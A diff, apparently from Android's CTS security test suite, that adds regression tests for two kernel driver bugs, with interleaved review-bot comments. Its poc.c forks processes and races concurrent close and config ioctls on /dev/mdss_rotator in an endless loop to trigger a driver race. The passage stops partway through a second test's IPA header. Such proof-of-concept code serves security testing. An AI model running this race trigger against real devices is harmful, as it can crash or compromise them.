+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-34328139
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-34328139/local_poc.h b/hostsidetests/security/securityPatch/Bug-34328139/local_poc.h
new file mode 100644
index 0000000..c14a36b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34328139/local_poc.h
@@ -0,0 +1,98 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __CMD_H__
+#define __CMD_H__
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+#ifndef _IOC_SIZEBITS
+# define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+# define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS)-1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS)-1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT+_IOC_SIZEBITS)
+
+#ifndef _IOC_NONE
+# define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+# define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+# define _IOC_READ 2U
+#endif
+
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#define _IOC(dir,type,nr,size) \
+ (((dir) << _IOC_DIRSHIFT) | \
+ ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | \
+ ((size) << _IOC_SIZESHIFT))
+
+
+#define _IO(type,nr) _IOC(_IOC_NONE,(type),(nr),0)
+#define _IOR(type,nr,size) _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOW(type,nr,size) _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+
+
+
+struct mult_factor {
+ uint32_t numer;
+ uint32_t denom;
+};
+
+struct mdp_rotation_buf_info {
+ uint32_t width;
+ uint32_t height;
+ uint32_t format;
+ struct mult_factor comp_ratio;
+};
+
+struct mdp_rotation_config {
+ uint32_t version;
+ uint32_t session_id;
+ struct mdp_rotation_buf_info input;
+ struct mdp_rotation_buf_info output;
+ uint32_t frame_rate;
+ uint32_t flags;
+ uint32_t reserved[6];
+};
+
+#define MDSS_ROTATOR_IOCTL_MAGIC 'w'
+
+#define MDSS_ROTATION_OPEN \
+ _IOWR(MDSS_ROTATOR_IOCTL_MAGIC, 1, struct mdp_rotation_config *)
+
+#define MDSS_ROTATION_CONFIG \
+ _IOWR(MDSS_ROTATOR_IOCTL_MAGIC, 2, struct mdp_rotation_config *)
+
+#define MDSS_ROTATION_CLOSE _IOW(MDSS_ROTATOR_IOCTL_MAGIC, 4, unsigned int)
+#endif
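Review bot: The structs `mult_factor`, `mdp_rotation_buf_info` and `mdp_rotation_config` use `uint32_t`, but the header includes nothing, so it compiles only when the including file has already pulled in the type; add `#include <stdint.h>` at the top. The ioctl encoding macros above the structs duplicate what `<linux/ioctl.h>` provides, and the guard `__CMD_H__` is a reserved identifier. `MDSS_ROTATION_OPEN` and `MDSS_ROTATION_CONFIG` pass `struct mdp_rotation_config *` as the size argument, which encodes the pointer size rather than the struct size. That presumably mirrors the driver's own definition, and a one-line comment such as `/* size is the pointer type, as in the driver header */` would stop a later reader from "fixing" it.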
diff --git a/hostsidetests/security/securityPatch/Bug-34328139/poc.c b/hostsidetests/security/securityPatch/Bug-34328139/poc.c
new file mode 100644
index 0000000..64337fd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34328139/poc.c
@@ -0,0 +1,141 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <unistd.h>
+#include <string.h>
+#include "local_poc.h"
+
+
+int fd;
+struct mdp_rotation_config config;
+int id;
+int status[10];
+int cmd = 0;
+
+void *threadForConfig(void *arg)
+{
+ int index = (int) (unsigned long)arg;
+
+ status[index] = 1;
+
+ while (cmd != 1) {
+ usleep(10);
+ }
+
+ if (cmd == -1)
+ goto failed;
+
+ usleep(5 * index);
+ ioctl(fd, MDSS_ROTATION_CONFIG, &config);
+failed:
+ status[index] = 2;
+ return NULL;
+
+}
+
+void *threadForClose()
+{
+ status[0] = 1;
+
+ while (cmd != 1) {
+ usleep(10);
+ }
+
+ if (cmd == -1)
+ goto failed;
+
+ usleep(50);
+ ioctl(fd, MDSS_ROTATION_CLOSE, id);
+failed:
+ status[0] = 2;
+ return NULL;
+}
+
+int main()
+{
+ int ret, i, count;
+ pthread_t tid[5];
+ int p = 5;
+
+ count = 0;
+retry:
+ if (p-- > 0){
+ fork();
+ }
+
+ cmd = 0;
+ for (i = 0; i < 10; i++)
+ status[i] = 0;
+
+ fd = open("/dev/mdss_rotator", O_RDONLY, 0);
+ if (fd < 0) {
+ return -1;
+ }
+
+ ret = ioctl(fd, MDSS_ROTATION_OPEN, &config);
+ if (ret < 0) {
+ goto failed;
+ } else {
+ id = config.session_id;
+ }
+
+ ret = pthread_create(&tid[0], NULL, threadForClose, NULL);
+ if (ret != 0) {
+ printf("thread failed! errno:%d err:%s\n",errno,strerror(errno));
+ goto failed;
+ }
+
+ for (i = 1; i < 10; i++) {
+ ret = pthread_create(&tid[1], NULL, threadForConfig, (void *)(unsigned long)i);
+ if (ret != 0) {
+ cmd = -1;
+ goto failed;
+ }
+ }
+
+ while (status[0] != 1 || status[1] != 1 || status[2] != 1
+ || status[3] != 1 || status[4] != 1 || status[5] != 1
+ || status[6] != 1 || status[7] != 1 || status[8] != 1
+ || status[9] != 1) {
+ usleep(50);
+ }
+
+ cmd = 1;
+ usleep(10);
+ ioctl(fd, MDSS_ROTATION_CONFIG, &config);
+
+ while (status[0] != 2 || status[1] != 2 || status[2] != 2
+ || status[3] != 2 || status[4] != 2 || status[5] != 2
+ || status[6] != 2 || status[7] != 2 || status[8] != 2
+ || status[9] != 2) {
+ usleep(50);
+ }
+
+
+failed:
+ close(fd);
+ printf("[pid:%d] try %d again!\n", getpid(), ++count);
+ goto retry;
+
+ return 0;
+}
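Review bot: The `if (cmd == -1) goto failed;` check in `threadForConfig` and `threadForClose` can never fire, because the preceding `while (cmd != 1)` only exits once `cmd` is 1. When main sets `cmd = -1` after a failed `pthread_create`, the threads already started keep spinning, and after `goto retry` resets `cmd` they act on the next round's `fd`. Waiting with `while (cmd == 0)` makes the abort path reachable. `cmd` and `status[]` are plain `int`s polled across threads, so they should be `volatile` or C11 atomics, or the busy-wait loops may be optimised into infinite loops. Every worker's id is stored in `tid[1]` and no thread is joined or detached, so each pass through the unbounded `retry` loop leaks ten threads; the trailing `return 0` is unreachable.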
diff --git a/hostsidetests/security/securityPatch/Bug-35047217/Android.mk b/hostsidetests/security/securityPatch/Bug-35047217/Android.mk
new file mode 100644
index 0000000..ccf6b5e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047217/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35047217
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-35047217/local_poc.h b/hostsidetests/security/securityPatch/Bug-35047217/local_poc.h
new file mode 100644
index 0000000..889018d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047217/local_poc.h
@@ -0,0 +1,1759 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+*/
+
+#ifndef _UAPI_MSM_IPA_H_
+#define _UAPI_MSM_IPA_H_
+
+#ifndef __KERNEL__
+#include <stdint.h>
+#include <stddef.h>
+#include <sys/stat.h>
+#endif
+#include <linux/ioctl.h>
+#include <linux/types.h>
+#include <linux/if_ether.h>
+
+/**
+ * unique magic number of the IPA device
+ */
+#define IPA_IOC_MAGIC 0xCF
+
+/**
+ * name of the default routing tables for v4 and v6
+ */
+#define IPA_DFLT_RT_TBL_NAME "ipa_dflt_rt"
+
+/**
+ * the commands supported by IPA driver
+ */
+#define IPA_IOCTL_ADD_HDR 0
+#define IPA_IOCTL_DEL_HDR 1
+#define IPA_IOCTL_ADD_RT_RULE 2
+#define IPA_IOCTL_DEL_RT_RULE 3
+#define IPA_IOCTL_ADD_FLT_RULE 4
+#define IPA_IOCTL_DEL_FLT_RULE 5
+#define IPA_IOCTL_COMMIT_HDR 6
+#define IPA_IOCTL_RESET_HDR 7
+#define IPA_IOCTL_COMMIT_RT 8
+#define IPA_IOCTL_RESET_RT 9
+#define IPA_IOCTL_COMMIT_FLT 10
+#define IPA_IOCTL_RESET_FLT 11
+#define IPA_IOCTL_DUMP 12
+#define IPA_IOCTL_GET_RT_TBL 13
+#define IPA_IOCTL_PUT_RT_TBL 14
+#define IPA_IOCTL_COPY_HDR 15
+#define IPA_IOCTL_QUERY_INTF 16
+#define IPA_IOCTL_QUERY_INTF_TX_PROPS 17
+#define IPA_IOCTL_QUERY_INTF_RX_PROPS 18
+#define IPA_IOCTL_GET_HDR 19
+#define IPA_IOCTL_PUT_HDR 20
+#define IPA_IOCTL_SET_FLT 21
+#define IPA_IOCTL_ALLOC_NAT_MEM 22
+#define IPA_IOCTL_V4_INIT_NAT 23
+#define IPA_IOCTL_NAT_DMA 24
+#define IPA_IOCTL_V4_DEL_NAT 26
+#define IPA_IOCTL_PULL_MSG 27
+#define IPA_IOCTL_GET_NAT_OFFSET 28
+#define IPA_IOCTL_RM_ADD_DEPENDENCY 29
+#define IPA_IOCTL_RM_DEL_DEPENDENCY 30
+#define IPA_IOCTL_GENERATE_FLT_EQ 31
+#define IPA_IOCTL_QUERY_INTF_EXT_PROPS 32
+#define IPA_IOCTL_QUERY_EP_MAPPING 33
+#define IPA_IOCTL_QUERY_RT_TBL_INDEX 34
+#define IPA_IOCTL_WRITE_QMAPID 35
+#define IPA_IOCTL_MDFY_FLT_RULE 36
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD 37
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL 38
+#define IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED 39
+#define IPA_IOCTL_ADD_HDR_PROC_CTX 40
+#define IPA_IOCTL_DEL_HDR_PROC_CTX 41
+#define IPA_IOCTL_MDFY_RT_RULE 42
+#define IPA_IOCTL_ADD_RT_RULE_AFTER 43
+#define IPA_IOCTL_ADD_FLT_RULE_AFTER 44
+#define IPA_IOCTL_GET_HW_VERSION 45
+#define IPA_IOCTL_MAX 46
+
+/**
+ * max size of the header to be inserted
+ */
+#define IPA_HDR_MAX_SIZE 64
+
+/**
+ * max size of the name of the resource (routing table, header)
+ */
+#define IPA_RESOURCE_NAME_MAX 32
+
+/**
+ * max number of interface properties
+ */
+#define IPA_NUM_PROPS_MAX 35
+
+/**
+ * size of the mac address
+ */
+#define IPA_MAC_ADDR_SIZE 6
+
+/**
+ * max number of mbim streams
+ */
+#define IPA_MBIM_MAX_STREAM_NUM 8
+
+/**
+ * the attributes of the rule (routing or filtering)
+ */
+#define IPA_FLT_TOS (1ul << 0)
+#define IPA_FLT_PROTOCOL (1ul << 1)
+#define IPA_FLT_SRC_ADDR (1ul << 2)
+#define IPA_FLT_DST_ADDR (1ul << 3)
+#define IPA_FLT_SRC_PORT_RANGE (1ul << 4)
+#define IPA_FLT_DST_PORT_RANGE (1ul << 5)
+#define IPA_FLT_TYPE (1ul << 6)
+#define IPA_FLT_CODE (1ul << 7)
+#define IPA_FLT_SPI (1ul << 8)
+#define IPA_FLT_SRC_PORT (1ul << 9)
+#define IPA_FLT_DST_PORT (1ul << 10)
+#define IPA_FLT_TC (1ul << 11)
+#define IPA_FLT_FLOW_LABEL (1ul << 12)
+#define IPA_FLT_NEXT_HDR (1ul << 13)
+#define IPA_FLT_META_DATA (1ul << 14)
+#define IPA_FLT_FRAGMENT (1ul << 15)
+#define IPA_FLT_TOS_MASKED (1ul << 16)
+#define IPA_FLT_MAC_SRC_ADDR_ETHER_II (1ul << 17)
+#define IPA_FLT_MAC_DST_ADDR_ETHER_II (1ul << 18)
+#define IPA_FLT_MAC_SRC_ADDR_802_3 (1ul << 19)
+#define IPA_FLT_MAC_DST_ADDR_802_3 (1ul << 20)
+#define IPA_FLT_MAC_ETHER_TYPE (1ul << 21)
+
+/**
+ * enum ipa_client_type - names for the various IPA "clients"
+ * these are from the perspective of the clients, for e.g.
+ * HSIC1_PROD means HSIC client is the producer and IPA is the
+ * consumer
+ */
+enum ipa_client_type {
+ IPA_CLIENT_PROD,
+ IPA_CLIENT_HSIC1_PROD = IPA_CLIENT_PROD,
+ IPA_CLIENT_WLAN1_PROD,
+ IPA_CLIENT_HSIC2_PROD,
+ IPA_CLIENT_USB2_PROD,
+ IPA_CLIENT_HSIC3_PROD,
+ IPA_CLIENT_USB3_PROD,
+ IPA_CLIENT_HSIC4_PROD,
+ IPA_CLIENT_USB4_PROD,
+ IPA_CLIENT_HSIC5_PROD,
+ IPA_CLIENT_USB_PROD,
+ IPA_CLIENT_A5_WLAN_AMPDU_PROD,
+ IPA_CLIENT_A2_EMBEDDED_PROD,
+ IPA_CLIENT_A2_TETHERED_PROD,
+ IPA_CLIENT_APPS_LAN_WAN_PROD,
+ IPA_CLIENT_APPS_CMD_PROD,
+ IPA_CLIENT_ODU_PROD,
+ IPA_CLIENT_MHI_PROD,
+ IPA_CLIENT_Q6_LAN_PROD,
+ IPA_CLIENT_Q6_WAN_PROD,
+ IPA_CLIENT_Q6_CMD_PROD,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_PROD,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD,
+ IPA_CLIENT_Q6_DECOMP_PROD,
+ IPA_CLIENT_Q6_DECOMP2_PROD,
+ IPA_CLIENT_UC_USB_PROD,
+
+ /* Below PROD client type is only for test purpose */
+ IPA_CLIENT_TEST_PROD,
+ IPA_CLIENT_TEST1_PROD,
+ IPA_CLIENT_TEST2_PROD,
+ IPA_CLIENT_TEST3_PROD,
+ IPA_CLIENT_TEST4_PROD,
+
+ IPA_CLIENT_CONS,
+ IPA_CLIENT_HSIC1_CONS = IPA_CLIENT_CONS,
+ IPA_CLIENT_WLAN1_CONS,
+ IPA_CLIENT_HSIC2_CONS,
+ IPA_CLIENT_USB2_CONS,
+ IPA_CLIENT_WLAN2_CONS,
+ IPA_CLIENT_HSIC3_CONS,
+ IPA_CLIENT_USB3_CONS,
+ IPA_CLIENT_WLAN3_CONS,
+ IPA_CLIENT_HSIC4_CONS,
+ IPA_CLIENT_USB4_CONS,
+ IPA_CLIENT_WLAN4_CONS,
+ IPA_CLIENT_HSIC5_CONS,
+ IPA_CLIENT_USB_CONS,
+ IPA_CLIENT_USB_DPL_CONS,
+ IPA_CLIENT_A2_EMBEDDED_CONS,
+ IPA_CLIENT_A2_TETHERED_CONS,
+ IPA_CLIENT_A5_LAN_WAN_CONS,
+ IPA_CLIENT_APPS_LAN_CONS,
+ IPA_CLIENT_APPS_WAN_CONS,
+ IPA_CLIENT_ODU_EMB_CONS,
+ IPA_CLIENT_ODU_TETH_CONS,
+ IPA_CLIENT_MHI_CONS,
+ IPA_CLIENT_Q6_LAN_CONS,
+ IPA_CLIENT_Q6_WAN_CONS,
+ IPA_CLIENT_Q6_DUN_CONS,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_CONS,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS,
+ IPA_CLIENT_Q6_DECOMP_CONS,
+ IPA_CLIENT_Q6_DECOMP2_CONS,
+ IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS,
+ /* Below CONS client type is only for test purpose */
+ IPA_CLIENT_TEST_CONS,
+ IPA_CLIENT_TEST1_CONS,
+ IPA_CLIENT_TEST2_CONS,
+ IPA_CLIENT_TEST3_CONS,
+ IPA_CLIENT_TEST4_CONS,
+
+ IPA_CLIENT_MAX,
+};
+
+#define IPA_CLIENT_IS_APPS_CONS(client) \
+ ((client) == IPA_CLIENT_APPS_LAN_CONS || \
+ (client) == IPA_CLIENT_APPS_WAN_CONS)
+
+#define IPA_CLIENT_IS_USB_CONS(client) \
+ ((client) == IPA_CLIENT_USB_CONS || \
+ (client) == IPA_CLIENT_USB2_CONS || \
+ (client) == IPA_CLIENT_USB3_CONS || \
+ (client) == IPA_CLIENT_USB_DPL_CONS || \
+ (client) == IPA_CLIENT_USB4_CONS)
+
+#define IPA_CLIENT_IS_WLAN_CONS(client) \
+ ((client) == IPA_CLIENT_WLAN1_CONS || \
+ (client) == IPA_CLIENT_WLAN2_CONS || \
+ (client) == IPA_CLIENT_WLAN3_CONS || \
+ (client) == IPA_CLIENT_WLAN4_CONS)
+
+#define IPA_CLIENT_IS_ODU_CONS(client) \
+ ((client) == IPA_CLIENT_ODU_EMB_CONS || \
+ (client) == IPA_CLIENT_ODU_TETH_CONS)
+
+#define IPA_CLIENT_IS_Q6_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_CONS || \
+ (client) == IPA_CLIENT_Q6_WAN_CONS || \
+ (client) == IPA_CLIENT_Q6_DUN_CONS || \
+ (client) == IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS)
+
+#define IPA_CLIENT_IS_Q6_ZIP_CONS(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_CONS || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_CONS)
+
+#define IPA_CLIENT_IS_Q6_NON_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_LAN_PROD || \
+ (client) == IPA_CLIENT_Q6_WAN_PROD || \
+ (client) == IPA_CLIENT_Q6_CMD_PROD)
+
+#define IPA_CLIENT_IS_Q6_ZIP_PROD(client) \
+ ((client) == IPA_CLIENT_Q6_DECOMP_PROD || \
+ (client) == IPA_CLIENT_Q6_DECOMP2_PROD)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_CONS(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_CONS || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS)
+
+#define IPA_CLIENT_IS_MEMCPY_DMA_PROD(client) \
+ ((client) == IPA_CLIENT_MEMCPY_DMA_SYNC_PROD || \
+ (client) == IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD)
+
+#define IPA_CLIENT_IS_MHI_CONS(client) \
+ ((client) == IPA_CLIENT_MHI_CONS)
+
+#define IPA_CLIENT_IS_MHI(client) \
+ ((client) == IPA_CLIENT_MHI_CONS || \
+ (client) == IPA_CLIENT_MHI_PROD)
+
+#define IPA_CLIENT_IS_TEST_PROD(client) \
+ ((client) == IPA_CLIENT_TEST_PROD || \
+ (client) == IPA_CLIENT_TEST1_PROD || \
+ (client) == IPA_CLIENT_TEST2_PROD || \
+ (client) == IPA_CLIENT_TEST3_PROD || \
+ (client) == IPA_CLIENT_TEST4_PROD)
+
+#define IPA_CLIENT_IS_TEST_CONS(client) \
+ ((client) == IPA_CLIENT_TEST_CONS || \
+ (client) == IPA_CLIENT_TEST1_CONS || \
+ (client) == IPA_CLIENT_TEST2_CONS || \
+ (client) == IPA_CLIENT_TEST3_CONS || \
+ (client) == IPA_CLIENT_TEST4_CONS)
+
+#define IPA_CLIENT_IS_TEST(client) \
+ (IPA_CLIENT_IS_TEST_PROD(client) || IPA_CLIENT_IS_TEST_CONS(client))
+
+/**
+ * enum ipa_ip_type - Address family: IPv4 or IPv6
+ */
+enum ipa_ip_type {
+ IPA_IP_v4,
+ IPA_IP_v6,
+ IPA_IP_MAX
+};
+
+/**
+ * enum ipa_rule_type - Type of routing or filtering rule
+ * Hashable: Rule will be located at the hashable tables
+ * Non_Hashable: Rule will be located at the non-hashable tables
+ */
+enum ipa_rule_type {
+ IPA_RULE_HASHABLE,
+ IPA_RULE_NON_HASHABLE,
+ IPA_RULE_TYPE_MAX
+};
+
+/**
+ * enum ipa_flt_action - action field of filtering rule
+ *
+ * Pass to routing: 5'd0
+ * Pass to source NAT: 5'd1
+ * Pass to destination NAT: 5'd2
+ * Pass to default output pipe (e.g., Apps or Modem): 5'd3
+ */
+enum ipa_flt_action {
+ IPA_PASS_TO_ROUTING,
+ IPA_PASS_TO_SRC_NAT,
+ IPA_PASS_TO_DST_NAT,
+ IPA_PASS_TO_EXCEPTION
+};
+
+/**
+ * enum ipa_wlan_event - Events for wlan client
+ *
+ * wlan client connect: New wlan client connected
+ * wlan client disconnect: wlan client disconnected
+ * wlan client power save: wlan client moved to power save
+ * wlan client normal: wlan client moved out of power save
+ * sw routing enable: ipa routing is disabled
+ * sw routing disable: ipa routing is enabled
+ * wlan ap connect: wlan AP(access point) is up
+ * wlan ap disconnect: wlan AP(access point) is down
+ * wlan sta connect: wlan STA(station) is up
+ * wlan sta disconnect: wlan STA(station) is down
+ * wlan client connect ex: new wlan client connected
+ * wlan scc switch: wlan interfaces in scc mode
+ * wlan mcc switch: wlan interfaces in mcc mode
+ * wlan wdi enable: wdi data path completed
+ * wlan wdi disable: wdi data path teardown
+ */
+enum ipa_wlan_event {
+ WLAN_CLIENT_CONNECT,
+ WLAN_CLIENT_DISCONNECT,
+ WLAN_CLIENT_POWER_SAVE_MODE,
+ WLAN_CLIENT_NORMAL_MODE,
+ SW_ROUTING_ENABLE,
+ SW_ROUTING_DISABLE,
+ WLAN_AP_CONNECT,
+ WLAN_AP_DISCONNECT,
+ WLAN_STA_CONNECT,
+ WLAN_STA_DISCONNECT,
+ WLAN_CLIENT_CONNECT_EX,
+ WLAN_SWITCH_TO_SCC,
+ WLAN_SWITCH_TO_MCC,
+ WLAN_WDI_ENABLE,
+ WLAN_WDI_DISABLE,
+ IPA_WLAN_EVENT_MAX
+};
+
+/**
+ * enum ipa_wan_event - Events for wan client
+ *
+ * wan default route add/del
+ * wan embms connect: New wan embms interface connected
+ */
+enum ipa_wan_event {
+ WAN_UPSTREAM_ROUTE_ADD = IPA_WLAN_EVENT_MAX,
+ WAN_UPSTREAM_ROUTE_DEL,
+ WAN_EMBMS_CONNECT,
+ WAN_XLAT_CONNECT,
+ IPA_WAN_EVENT_MAX
+};
+
+enum ipa_ecm_event {
+ ECM_CONNECT = IPA_WAN_EVENT_MAX,
+ ECM_DISCONNECT,
+ IPA_ECM_EVENT_MAX,
+};
+
+enum ipa_tethering_stats_event {
+ IPA_TETHERING_STATS_UPDATE_STATS = IPA_ECM_EVENT_MAX,
+ IPA_TETHERING_STATS_UPDATE_NETWORK_STATS,
+ IPA_TETHERING_STATS_EVENT_MAX,
+ IPA_EVENT_MAX_NUM = IPA_TETHERING_STATS_EVENT_MAX
+};
+
+#define IPA_EVENT_MAX ((int)IPA_EVENT_MAX_NUM)
+
+/**
+ * enum ipa_rm_resource_name - IPA RM clients identification names
+ *
+ * Add new mapping to ipa_rm_prod_index() / ipa_rm_cons_index()
+ * when adding new entry to this enum.
+ */
+enum ipa_rm_resource_name {
+ IPA_RM_RESOURCE_PROD = 0,
+ IPA_RM_RESOURCE_Q6_PROD = IPA_RM_RESOURCE_PROD,
+ IPA_RM_RESOURCE_USB_PROD,
+ IPA_RM_RESOURCE_USB_DPL_DUMMY_PROD,
+ IPA_RM_RESOURCE_HSIC_PROD,
+ IPA_RM_RESOURCE_STD_ECM_PROD,
+ IPA_RM_RESOURCE_RNDIS_PROD,
+ IPA_RM_RESOURCE_WWAN_0_PROD,
+ IPA_RM_RESOURCE_WLAN_PROD,
+ IPA_RM_RESOURCE_ODU_ADAPT_PROD,
+ IPA_RM_RESOURCE_MHI_PROD,
+ IPA_RM_RESOURCE_PROD_MAX,
+
+ IPA_RM_RESOURCE_Q6_CONS = IPA_RM_RESOURCE_PROD_MAX,
+ IPA_RM_RESOURCE_USB_CONS,
+ IPA_RM_RESOURCE_USB_DPL_CONS,
+ IPA_RM_RESOURCE_HSIC_CONS,
+ IPA_RM_RESOURCE_WLAN_CONS,
+ IPA_RM_RESOURCE_APPS_CONS,
+ IPA_RM_RESOURCE_ODU_ADAPT_CONS,
+ IPA_RM_RESOURCE_MHI_CONS,
+ IPA_RM_RESOURCE_MAX
+};
+
+/**
+ * enum ipa_hw_type - IPA hardware version type
+ * @IPA_HW_None: IPA hardware version not defined
+ * @IPA_HW_v1_0: IPA hardware version 1.0
+ * @IPA_HW_v1_1: IPA hardware version 1.1
+ * @IPA_HW_v2_0: IPA hardware version 2.0
+ * @IPA_HW_v2_1: IPA hardware version 2.1
